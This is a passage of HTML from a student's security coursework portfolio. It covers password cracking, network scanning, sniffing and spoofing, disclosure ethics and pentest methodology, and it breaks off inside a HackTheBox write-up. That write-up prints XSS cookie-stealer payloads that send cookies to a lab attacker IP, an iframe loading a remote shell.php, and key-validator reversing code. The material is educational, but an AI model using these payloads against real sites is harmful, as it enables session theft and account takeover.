          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
           <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
           it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
           <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
          <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
